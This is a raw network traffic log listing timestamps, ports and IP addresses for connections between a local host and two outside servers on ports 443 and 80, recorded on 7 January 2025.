Jan 7, 2025 11:02:04.480134964 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480139971 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480173111 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480226040 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480277061 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480282068 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480294943 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480341911 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480355024 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480402946 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480454922 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480525017 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480571985 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480611086 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480628014 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480634928 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480647087 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480678082 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480720043 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480732918 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480740070 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480772972 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480851889 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480916023 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480921984 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480931044 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480969906 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.480974913 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.480998993 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.529109955 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.565896034 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.565943003 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.565989971 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566046000 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566050053 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566086054 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566101074 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566190004 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566241026 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566241026 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566241026 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566255093 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566294909 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566294909 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566564083 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566632032 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566632986 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566643000 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566692114 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566701889 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566759109 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.566808939 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.566859961 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.572803974 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.670377016 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.670413017 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.670499086 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.670533895 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.670552969 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.670588017 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.771831036 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.772089958 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.772126913 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.772177935 CET	49717	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.776953936 CET	80	49717	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.855783939 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856018066 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.856039047 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856050968 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856101036 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.856125116 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856169939 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856172085 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.856180906 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.856220961 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857189894 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857243061 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857251883 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857265949 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857283115 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857294083 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857325077 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857328892 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857352972 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857420921 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857462883 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857470036 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857482910 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857512951 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857518911 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857542038 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857552052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857594967 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857606888 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857613087 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857640982 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857731104 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857765913 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857789993 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857796907 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857815981 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857826948 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857878923 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857886076 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857902050 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857939005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857944965 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.857969046 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.857978106 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858022928 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858028889 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858052969 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858087063 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858093023 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858114958 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858118057 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858156919 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858165979 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858171940 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858207941 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858249903 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858299017 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858304977 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858334064 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858356953 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858364105 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858387947 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858390093 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858437061 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858444929 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858481884 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858494997 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858508110 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858525991 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858566046 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858612061 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858618975 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858632088 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858654976 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858663082 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858690023 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858740091 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858792067 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858800888 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858813047 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858849049 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858855009 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.858879089 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.858978987 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859035015 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859042883 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859055042 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859090090 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859097958 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859103918 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859133959 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859138012 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859165907 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859168053 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859179020 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859193087 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859226942 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.859245062 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.859298944 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943017006 CET	49718	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.943717003 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943768978 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943789005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943820953 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943836927 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943836927 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943867922 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943875074 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943888903 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.943893909 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943958998 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.943965912 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.944031954 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.944813013 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.944866896 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.944883108 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.944933891 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.944957018 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945002079 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945007086 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945014954 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945054054 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945065022 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945151091 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945190907 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945210934 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945216894 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945235014 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945244074 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945270061 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945274115 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945287943 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945316076 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945360899 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945368052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945410013 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945414066 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945421934 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945461988 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945466995 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945475101 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945503950 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945518017 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945552111 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945583105 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945600986 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945607901 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945625067 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945653915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945661068 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945668936 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945696115 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945734024 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945779085 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945785046 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945791006 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945831060 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945867062 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945916891 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945940018 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.945988894 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.945995092 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946003914 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946047068 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946069002 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946127892 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946162939 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946208954 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946254969 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946305990 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946451902 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946485043 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946510077 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946516991 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946527958 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946602106 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946635962 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946652889 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946660995 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946687937 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946703911 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946819067 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946868896 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946870089 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946878910 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:04.946913958 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.946938992 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:04.947894096 CET	80	49718	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.947978020 CET	49718	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.950335979 CET	49718	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.955034018 CET	80	49718	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:04.955089092 CET	49718	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:04.959851027 CET	80	49718	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:05.031452894 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.031488895 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.031532049 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.031567097 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.031589985 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.031613111 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032258987 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032303095 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032319069 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032330990 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032360077 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032385111 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032511950 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032573938 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032589912 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032644987 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032737970 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032814026 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032839060 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032847881 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032862902 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032864094 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032890081 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032896996 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.032921076 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.032979965 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033020973 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033030033 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033071995 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033090115 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033117056 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033128977 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033134937 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033162117 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033181906 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033220053 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033265114 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033278942 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033288956 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033303022 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033319950 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033333063 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033338070 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033354998 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033395052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033449888 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033457041 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033509970 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033515930 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033526897 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033564091 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033586979 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033593893 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033606052 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033610106 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033641100 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033644915 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033688068 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033734083 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033740997 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033767939 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033782005 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033791065 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033817053 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033922911 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033947945 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033966064 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.033973932 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.033997059 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.034111023 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034147978 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.034149885 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034162998 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034198999 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.034219980 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034251928 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034266949 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.034275055 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034291983 CET	49713	443	192.168.2.5	194.15.112.248
Jan 7, 2025 11:02:05.034292936 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034322977 CET	443	49713	194.15.112.248	192.168.2.5
Jan 7, 2025 11:02:05.034337997 CET	49713	443	192.168.2.5	194.15.112.248
